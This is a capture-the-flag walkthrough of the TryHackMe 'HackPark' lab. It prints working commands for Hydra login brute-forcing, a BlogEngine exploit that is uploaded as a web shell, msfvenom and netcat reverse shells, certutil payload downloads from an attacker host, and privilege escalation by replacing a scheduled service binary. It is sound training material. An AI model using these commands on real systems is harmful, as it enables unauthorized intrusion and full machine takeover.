TryHackMe: HackPark

[Task 1] Deploy the vulnerable Windows machine

1. Deploy the machine and access its web server.

Port Scan

nmap -Pn <ip>

High port scan

nmap -p1000- -Pn <ip>

Service and OS scan

nmap -A -p 80,3389 <ip>

Vulnerable scan

nmap -p 80,3389 --script vuln <ip>

This machine may have some filter or firewall, because I can do only port scanning.

Conclusion:
There’re 2 services
Port no. 80 Microsoft-ISS?
Port no.3389 Microsoft remote desktop?

I guess it’s windows machine, because there’s port no.3389 is probably Remote Desktop Service.

2. Whats the name of the clown displayed on the homepage?

Access HTTP site

[Task 2] Using Hydra to brute-force a login

1. What request type is the Windows website login form using?

Let’s explore the site

Post section

Try SQL Injection

1' or 1=1--+

SQL injection doesn’t work.

Try XSS

XSS doesn’t work neither.

<script>alert('XSS')</script>

Archive section, not useful

Contact section

Try SQL injection

Seems like the form is not properly implemented.

Login section, this site use “blogengine.net”

Default credentail is admin:admin

Reference : https://blogengine.io/support/get-started/

Let’s try it. Failed!!!

Let’s find other directory with gobuster

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html,aspx

I access many links, but it’s as same as other sections

Let’s access robots.txt, not much useful.

Since there’s no other ways left. I’ll have to do brute-forcing with hydra.

Create user list first

echo admin > users.txt
echo pennywise >> users.txt
cat users.txt

Intercept login request w/ Burp Suite

It’s a POST request

2. Guess a username, choose a password wordlist and gain credentials to a user account!

Craft hydra command, copy the request and edit username value as “^USER^” and password value as “^PASS^”

Prepare hydra command

hydra -L  <username list> -P <password list> <ip> http-post-form   "/<login url>:username=^USER^&password=^PASS^:F=incorrect" -u -V -F

Replace request

Run command

Credential is admin:1qaz2wsx .

[Task 3] Compromise the machine

1. Now you have logged into the website, are you able to identify the version of the BlogEngine?

At about section, BlogEngine is version 3.3.6.0.

2. Use the exploit database archive to find an exploit to gain a reverse shell on this system. What is the CVE?

I can use seachsploit instead of finding in the site.

searchsploit blogengine

Copy it

searchsploit -m 46353

Review the script

3. Using the public exploit, gain initial access to the server.
Who is the webserver running as?

Edit IP address and port no.

Save as PostView.ascx

Back to dashboard, click at Content -> Posts -> New

Click directory icon

Upload the script

Create listener

nc -lvp 1234

Access the uploaded script

http://<ip>?theme=../../App_Data/files

Now I have a shell.

whoami

[Task 4] Windows Privilege Escalation

1. Our netcat session is a little unstable, so lets generate another reverse shell using msfvenom.

Reference: https://netsec.ws/?p=331

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Create HTTP Server

python -m SimpleHTTPServer 80

Back to victim’s machine, download file

cd \Windows\Temp
certutil -urlcache -f http://<ip>/shell.exe shell.exe
dir

Also, I download winPEAS.exe in case I need it later.

certutil -urlcache -f http://<ip>/winPEAS.exe winPEAS.exe

Back to attacker’s machine, set up metasploit handler

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
Set RHOST <Remote IP>
set LHOST <Local IP>
set LPORT <Local Port>
Run

Back to victim’s machine, run shell.exe

shell.exe

Back to attacker’s machine, now I have a shell.

2. What is the OS version of this windows machine?

sysinfo

2. What is the name of the abnormal service running?

Try to escalate privilege

getsystem

Seems like I can’t do by this method.

run post/multi/recon/local_exploit_suggester

I’ll try to run these exploits.

background

use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
run

Failed!!!

I tried to run other exploits, but I failed with every exploits. I have to find another way.

2. What is the name of the binary you’re supposed to exploit?

I need to run WinPEAS.

shell

winPEAS.exe

Seems like there’re errors. I need to run simpler script, winPEAS.bat .

Download winPEAS.bat

certutil -urlcache -f http://10.11.11.30/winPEAS.bat winPEAS.bat

winPEAS.bat

3. Using this abnormal service, escalate your privileges! What is the user flag (on Jeffs Desktop)?

cd Program Files (x86)
cd SystemScheduler
dir

cd Events
dir

Read the log file

type 20198415519.INI_LOG.txt

There’s Message.exe with Administrator type.

Copy Message.exe as a backup in case I screw up.

cd ..
copy Message.exe Message_bak.exe

I need to replace Message.exe with malicious file.

Back to attacker’s machine, create another shell file.

msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=1236 -f exe > Message.exe

Create listener

nc -lvp 1236

Download Message.exe

certutil -urlcache -f http://10.11.11.30/Message.exe Message.exe

Back to attacker’s machine at port no.1236 listener, wait for a moment

whoami

Seems like I can’t run this command.

Run whoami alternative

echo %username%

I’m root/Administrator.

cd \Users\jeff\Desktop
dir
type user.txt

4. What is the root flag?

cd \Users\Administrator\Desktop
type root.txt